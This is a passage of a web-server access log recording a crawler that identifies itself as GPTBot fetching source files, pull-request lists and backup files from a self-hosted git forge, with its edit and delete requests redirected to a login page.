+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12739] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12826] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12859] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12860] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12348] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11642] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:17:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" -[17/Feb/2026:17:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" -[17/Feb/2026:17:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" -[17/Feb/2026:17:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" -[17/Feb/2026:17:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11090] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" -[17/Feb/2026:17:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" -[17/Feb/2026:17:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11093] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" -[17/Feb/2026:17:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" -[17/Feb/2026:17:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11899] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" -[17/Feb/2026:17:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" -[17/Feb/2026:17:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" -[17/Feb/2026:17:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12746] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:17:44:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 227529] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp" [Client 74.7.227.38] [Length 28367] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:17:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp" [Client 74.7.227.38] [Length 59098] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:17:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fTestApp" [Client 74.7.227.38] [Length 24184] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fMakefile" [Client 74.7.227.38] [Length 30849] [Gzip 6.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12032] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:44:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:17:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:17:44:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:17:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:17:44:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:44:51 